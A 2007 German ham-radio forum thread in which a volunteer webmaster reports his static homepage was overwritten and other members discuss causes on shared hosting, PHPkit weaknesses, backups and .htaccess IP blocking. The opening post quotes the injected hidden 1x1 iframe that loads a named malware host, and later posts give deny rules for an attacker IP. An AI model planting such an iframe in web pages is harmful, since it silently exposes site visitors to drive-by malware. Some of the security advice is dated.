Homepage gecrackt?

Location: Coburg

Tuesday, June 19th 2007, 8:06pm

Hallo beisammen,

ich betreue eine kleine Homepage von einer AFu Gruppe. Erstellt wurde die Seite mit NetObjects Fusion. Alles soweit HTML, keine Spezialfunktionen. Gestern bekam ich von einem OM den Hinweis die Seite sei nicht mehr erreichbar.

Die Nachprüfung ergab: Seite bleit weiß. Kein Bild, kein Text, kein garnix.

Heute bin ich dem nachgegangen. Der Zugriff per FTP zeigte das meine index.html nur noch 101 Byte groß war. Sonst ca. 10 KB.

Als ich mir die Datei mal angesehen habe ans ich dieses: (absichtlich in ### kommentiert damit der Code nicht ausgeführt wird)

###<iframe src='http://cikutalist.com/bonus/' width='1' height='1' style='visibility: hidden;'></iframe>###

Wenn man unsere URL aufruft im Browser, sieht man in der Statusleiste das etwas von cikutalist.com geladen wird, aber der Bildschirm bleibt weiß.

Die Frage ist wie konnte die index.html überschrieben werden und welchen Zweck hat sie? Ich möchte die URL auch nicht manuell aufrufen.

Vielleicht kann ja mal ein Experte die Seite anschauen und herausfinden ob irgendein Schlupfloch vorhanden ist.

www.funkfreundenordfranken.de

Ist aber eigentlich alles nur HTML. Ich bin ratlos.

Kann sich über die Seite ein Virus, Trojaner oder sonstiiges einschleusen? Verwende Firefox 2.0.0.4.

Gruß, Attila dl1nux.de

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

DC4LO

Super Moderator

Posts: 4,262

2

Tuesday, June 19th 2007, 8:16pm

RE: Homepage gecrackt?

Hallo Attila,
ich wollte heute schon eine Warnung schreiben, aber es scheint bei vielen Webservern zu funktionieren. Siehe hier:
http://www.avira.com/de/sicherheits-news…_webseiten.html

Das war das Ergebnis von heute Morgen. Die angegebene IP-Adresse ist zu sperren!

Vy 73 de Gerhard

dl1nux

Posts: 815

Location: Coburg

3

Tuesday, June 19th 2007, 8:28pm

RE: Homepage gecrackt?

Hallo gerhard,

danke für den Link. Dann werde ich mal scannen ob ich mir was eingefangen habe.

Über jegliche neue Informationen zu diesem Thema wäre ich dankbar.

Gruß,
Attila

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

DC4LO

Super Moderator

Posts: 4,262

4

Tuesday, June 19th 2007, 8:48pm

RE: Homepage gecrackt?

Hallo Attia,
ich bleibe am Ball und beobachte das Zeug...

Vy73 de Gerhard

dl1nux

Posts: 815

Location: Coburg

5

Tuesday, June 19th 2007, 11:30pm

Die Frage bleibt trotzdem: Wie kann das geschehen das eine Datei auf dem Server überschrieben wird? Ist das ein Server- oder ein Homepage-Problem? Es gibt ja z.B. anfällige PHP/MySQL Anwendungen.

Kann ich als Homepagebetreiber dagegen was tun ausser regelmäßig zu kontrollieren und ggf. die schadhafte Datei zu löschen?

73 de dl1nux.de

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

DK2MD

Posts: 389

6

Wednesday, June 20th 2007, 5:08am

Quoted

Original von dl1nux
Die Frage bleibt trotzdem: Wie kann das geschehen das eine Datei auf dem Server überschrieben wird? Ist das ein Server- oder ein Homepage-Problem? Es gibt ja z.B. anfällige PHP/MySQL Anwendungen.

Kann ich als Homepagebetreiber dagegen was tun ausser regelmäßig zu kontrollieren und ggf. die schadhafte Datei zu löschen?

73 de dl1nux.de

An Deiner Stelle würd ich mal die Schreibrechte "CHMOD" auf Deinem Webserver und die der Dateien überprüfen. Bei statischen Webseiten sollten die auf "664" stehen, falls ich mich irre, bitte ich um "Prügel"

73!

73! de DK2MD, Reinhard
http://www.dk2md.de

dl5ym

Posts: 1,073

7

Wednesday, June 20th 2007, 7:31am

Quoted

Original von DK2MD

Quoted

Original von dl1nux
Die Frage bleibt trotzdem: Wie kann das geschehen das eine Datei auf dem Server überschrieben wird? Ist das ein Server- oder ein Homepage-Problem? Es gibt ja z.B. anfällige PHP/MySQL Anwendungen.

Kann ich als Homepagebetreiber dagegen was tun ausser regelmäßig zu kontrollieren und ggf. die schadhafte Datei zu löschen?

73 de dl1nux.de

An Deiner Stelle würd ich mal die Schreibrechte "CHMOD" auf Deinem Webserver und die der Dateien überprüfen. Bei statischen Webseiten sollten die auf "664" stehen, falls ich mich irre, bitte ich um "Prügel"

73!

Ohne falsche Hektik.. wovon reden wir ?
von einem Root-Server
oder von einem Shared Server?

im shared Server hast du eh an vielen Stellen keinen Einfluss...
und beim Root Server sollten diese Fragen nicht kommen ( nicht bei Leuten, die eine kompletten Server verwalten wollen/müssen.

Hats du aber einen shared Server (also eigentlich nur Zugriff auf den Paltz für den Webseite), dann ist eh der Provider gefordert, wenn es um Bugfixes geht.
Du kannst und solltest nur sauberen Code verwenden (cgi-perl, Php ..oder welche Scriptsprache auch immer) bei 100% HTML kann durch HTML selber nix passieren..wohl aber durchg System- und Serverlöcher

Windows oder uUnix(Linux)-Server ?

73
Fred

dl1nux

Posts: 815

Location: Coburg

8

Wednesday, June 20th 2007, 10:51am

Hi!

es ist nur gemieteter Webspace bei einem recht unbekannten Anbieter. Ich habe es nicht selber eingerichtet. Ich habe nur die Homepagegestaltung übernommen :-)

Die Dateien sind alle HTML, nix PHP/MySQL.

Dann kann ich ja nichts dagegen tun wenn der Schädling über Schlupflöcher im Server kommt. Hier ist dann der Betreiber gefragt meine ich.

73 de dl1nux.de

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

dl5ym

Posts: 1,073

9

Wednesday, June 20th 2007, 11:49am

Quoted

Original von dl1nux
Hi!

es ist nur gemieteter Webspace bei einem recht unbekannten Anbieter. Ich habe es nicht selber eingerichtet. Ich habe nur die Homepagegestaltung übernommen :-)

gemeiteter Webspace -> also shared Server (mit anderen Mietern zusammen)

Quoted

Die Dateien sind alle HTML, nix PHP/MySQL.

Dann kann ich ja nichts dagegen tun wenn der Schädling über Schlupflöcher im Server kommt. Hier ist dann der Betreiber gefragt meine ich.

73 de dl1nux.de

Deine Seiten vielleicht- aber wenn auf der Maschin PHP läuft ( = installiert ist)... oder Perl-cgi..oder ...so, dann muss nur *ein einziger* Nutzer/Mieter das verwenden - quasi nach aussen erreichbar machen -und schon ist der Angreifer auf der Maschine und kann seinen Karm in alle (!) User-Verzeichnisse verbreiten!
Da hast du mit deinem HTML-Text keine Chance..wenn es Hintertürchen gibt.

Entweder reagiert der Serverbetreiber -du hast doch wohl hoffentlich schon angefragt !? - oder du solltest dich nach einem anderen Provider umsehen.. oder mit dem, was passiert ist - leben können!

Ob klein oder (unbekannt) ist dabei weniger die Frage. Es ist niemand vor Fehlern gefeit, keiner kennt wirklich alle Lücken.. es passiert also immer wieder - sollte allerdings bei den guten Providern nur einmal passieren ! Das ist der Unterschied...

73
Fred
dl5ym

DK2MD

Posts: 389

10

Wednesday, June 20th 2007, 12:33pm

Oh weia, da verwendet einer PHPkit

Schmeiss des schnellstmöglich runter, das ist unsicher wie Sau. Mein Webhoster hatte mir mal ne Abmahnung zukommen lassen, das ich dieses CMS nicht mehr auf seinen Servern nutzen darf.

Befindet sich die Homepage, von der Du gesprochen hast, zufällig bei dem selben Server Deines Webhoster? ***EDIT: Nein hab grad nachgesehen, ist ein anderer Webhoster***

Wenn ja, ist alles klar, wie der "Schädling" auf die Hmepage kam. PHPkit bietet dafür die idealen Voraussetzungen

Ich hatte selbst schon das CMS PHPkit für unseren OV-Auftritt verwendet, eigentlich lief alles einige Jahre lang wunderbar, bis die Seite auch gehackt und alles zerstört wurde.

73! de DK2MD, Reinhard
http://www.dk2md.de

This post has been edited 1 times, last edit by "DK2MD" (Jun 20th 2007, 12:43pm)

dl1nux

Posts: 815

Location: Coburg

11

Wednesday, June 20th 2007, 12:43pm

@dk2md:

Nein PHPkit läuft wo anders. Wie gesagt die betroffene Homepage habe ich nur übernommen in der Pflege.

PHPKit ist von der Bedienung eine tolle Sache. Das Kontaktformular habe ich bereits Anfgriffsfrei (SPAM) gemacht und das Gästebuch ist nicht aktiviert.

Gibt's noch mehr Schlupflöcher? Es gibt leider nicht viele CMS die so einfach zu bedienen sind. PHPfusion ist z.B. total umständlich. Joomla! ist auch toll, verwende ich auch schon. Was ist denn generell zu empfehlen?

73 de dl1nux

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

DK2MD

Posts: 389

12

Wednesday, June 20th 2007, 12:46pm

Nun da ich PHPkit nicht mehr nutze hab ich micht mehr darum gekümmert. Ich verwende jetzt Hauptsächlich Joomla bei meinen Projekten. Ansonsten wär es sinnvoll, PHPkit bzw. auch die Homepage auf der "nur" html eingesetzt wird, mit einer entsprechend konfigurierten .htaccess zu schützen.

***EDIT: Noch kurz angemerkt, es gibt kein 100%ig sicheres System, egal ob HTML-Standallone oder PHP oder was sonst so gibt!!! ***

Noch als Tipp:
Am besten regelmäßig Backups der Dateien und der Datenbanken machen, dann ist der Schaden nicht zu groß!! :fan:

73! de DK2MD, Reinhard
http://www.dk2md.de

This post has been edited 1 times, last edit by "DK2MD" (Jun 20th 2007, 12:55pm)

dl1nux

Posts: 815

Location: Coburg

13

Wednesday, June 20th 2007, 2:09pm

Was nützt es mir die Webseite per .htaccess zu schützen wenn dann keiner mehr Zugriff drauf hat?

Es sind ja öffentliche Seiten, die SOLLEN ja für jedermann erreichbar sein.

Oder verstehe ich die Aussage falsch?

Gehackt auf der Homepage wurde ja die index.html. Schütze ich das Rootverzeichnis kann ich die HP gleich dicht machen.

Auf dem betroffenen Webserver haben wir keine DB (im Paket) sonst hätte ich schon längst auf Joomla umgestellt. Allerdings kann man mit NetObjects so schöne Bildergalerien einfach zusammenstellen.

73 de dl1nux

73 de Attila, DL1NUX

Mehr über mich: www.DL1NUX.de

DK2MD

Posts: 389

14

Wednesday, June 20th 2007, 2:18pm

Das hast Du dann falsch verstanden. Mit einer .htaccess Datei kannst Du z.B. bestimmte IP-Bereiche sperren. Wenn Du weist, welcher IP-Bereich den Schaden verursacht hat, kannst Du den Eintrag "Deny from xx.xx.xxx.xx" verwenden. Aktuell ist in der Presse von Hackern die Rede, der Webseiten krackt und einen Trojaner einschleust die Rede. Die IP, die oft verwendet wurde lautet: 64.38.33.13

Der .htaccess Eintrag schaut dann folglich so aus:

Deny from 64.38.33.13

oder

Deny from 64.38.33

Mehr ist nicht notwendig.

Mehr zu dem Thema unter SelfHTML

73! de DK2MD, Reinhard
http://www.dk2md.de

This post has been edited 4 times, last edit by "DK2MD" (Jun 20th 2007, 2:33pm)

dl5ym

Posts: 1,073

15

Wednesday, June 20th 2007, 3:28pm

Quoted

Original von DK2MD
Das hast Du dann falsch verstanden. Mit einer .htaccess Datei kannst Du z.B. bestimmte IP-Bereiche sperren. Wenn Du weist, welcher IP-Bereich den Schaden verursacht hat, kannst Du den Eintrag "Deny from xx.xx.xxx.xx" verwenden. Aktuell ist in der Presse von Hackern die Rede, der Webseiten krackt und einen Trojaner einschleust die Rede. Die IP, die oft verwendet wurde lautet: 64.38.33.13

Der .htaccess Eintrag schaut dann folglich so aus:

Deny from 64.38.33.13

oder

Deny from 64.38.33

Mehr ist nicht notwendig.

Mehr zu dem Thema unter SelfHTML

na ja ..heute..aber wer weiss, was morgen ist!
Also: wenn Du nur HTML drauf hast .. kannst nix ändern...das Loch entsteht (auch) wenn auf dem Server PHP von aussen ansprechbar ist.... PhP selber läuft ja meist als root oder chroot - aber (!) PHP soll ja alle UserPages erreichen können.. entweder Dein provider tut dir permanent die Flicken drauf.. oder du nimmst kein PHP (auf einen öffentlichen Server!)...
besagte 64.38.33.13 ist die URL zum Nachladen ..und läuft auf dem Client ... ob htaccess oder nicvht ist schon egal...der Client (Kunde..ahnungslose SURFER) ruft die als iFRAME auf... bei anderen gern in einem 1x1 Pixel grossen Fenster...
Also letzlich kannst nur deine Seite überwachen.. saubers HTML reinstellen...
Dein tolles PHP-CMS kannst du gern zu Hause auf einem nichtöffentlichen Server nehmen... im Internet aber nur bedingt verwendbar. Du darfst auch gern die langen Listen zu Softwareschwachstellen lesen.
Es reicht auch Perl ..usw. von Gästebüchern... inaktiv ist zu wenig - da muss alles runter.. weil: man kann auch das "Inaktive" aufrufen..wenn es öffentlich erreichbar ist .... und der Webcrawlwer (also der SuchRobot) findet schon die typischen Zeilen...

73
Fred